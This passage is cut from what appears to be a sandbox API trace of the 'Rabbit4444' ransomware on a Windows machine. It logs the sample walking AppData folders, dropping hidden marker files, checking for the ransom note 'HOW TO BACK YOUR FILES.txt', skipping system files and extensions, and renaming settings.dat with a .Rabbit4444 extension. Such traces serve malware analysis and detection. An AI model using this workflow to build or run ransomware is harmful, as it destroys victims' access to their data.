cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.675] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.675] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.675] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1105f0f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1105f0f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.675] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0066.675] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.675] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.676] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.676] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.676] CloseHandle (hObject=0x27c) returned 1 [0066.676] CloseHandle (hObject=0x228) returned 1 [0066.676] GetCurrentThreadId () returned 0xd98 [0066.676] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0066.676] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData" [0066.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b508 | out: hHeap=0xe0000) returned 1 [0066.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0066.676] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData" [0066.676] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\" [0066.676] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0066.676] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.678] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.681] FlushFileBuffers (hFile=0x228) returned 1 [0066.681] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.682] CloseHandle (hObject=0x228) returned 1 [0066.685] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData") returned 105 [0066.685] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.685] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0066.685] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.685] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.685] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.685] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.685] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.685] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.685] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.685] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.685] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.685] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.685] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1105f0f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1105f0f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.685] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.685] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.685] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1105f0f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1105f0f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.685] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0066.685] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.685] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.686] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.686] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.686] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.686] CloseHandle (hObject=0x27c) returned 1 [0066.686] CloseHandle (hObject=0x228) returned 1 [0066.686] GetCurrentThreadId () returned 0xd98 [0066.686] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0066.686] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings" [0066.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0066.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0066.687] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings" [0066.687] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\" [0066.687] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0066.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.688] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.691] FlushFileBuffers (hFile=0x228) returned 1 [0066.692] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.692] CloseHandle (hObject=0x228) returned 1 [0066.693] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings") returned 100 [0066.693] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.693] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf112c0c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0066.693] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.693] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.693] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.693] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.693] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf112c0c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.693] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.693] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.693] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.693] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.693] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.693] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf112c0c5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf112c0c5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf112c0c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.693] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.694] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.694] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0066.694] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0066.694] lstrcpyW (in: lpString1=0x130ec02, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0066.694] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0066.695] lstrlenW (lpString="roaming.lock") returned 12 [0066.695] lstrlenW (lpString="Rabbit4444") returned 10 [0066.695] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0066.695] lstrlenW (lpString=".dll") returned 4 [0066.695] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0066.695] lstrlenW (lpString=".lnk") returned 4 [0066.695] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0066.695] lstrlenW (lpString=".ini") returned 4 [0066.695] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0066.695] lstrlenW (lpString=".sys") returned 4 [0066.695] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0066.695] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0066.695] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0066.695] lstrcpyW (in: lpString1=0x130ec02, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0066.695] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0066.696] lstrlenW (lpString="settings.dat") returned 12 [0066.696] lstrlenW (lpString="Rabbit4444") returned 10 [0066.696] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0066.696] lstrlenW (lpString=".dll") returned 4 [0066.696] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0066.696] lstrlenW (lpString=".lnk") returned 4 [0066.696] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0066.696] lstrlenW (lpString=".ini") returned 4 [0066.696] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0066.696] lstrlenW (lpString=".sys") returned 4 [0066.696] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0066.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0066.696] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0066.696] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15800694031) returned 1 [0066.696] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0066.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0066.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0066.696] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0066.697] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0066.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0066.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0066.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0066.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0066.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0066.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0066.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0066.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0066.700] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15801086212) returned 1 [0066.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0066.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0066.700] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.700] CloseHandle (hObject=0x260) returned 1 [0066.700] CloseHandle (hObject=0x27c) returned 1 [0066.700] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 124 [0066.701] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0066.702] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0066.703] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0066.703] lstrcpyW (in: lpString1=0x130ec02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.703] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.703] 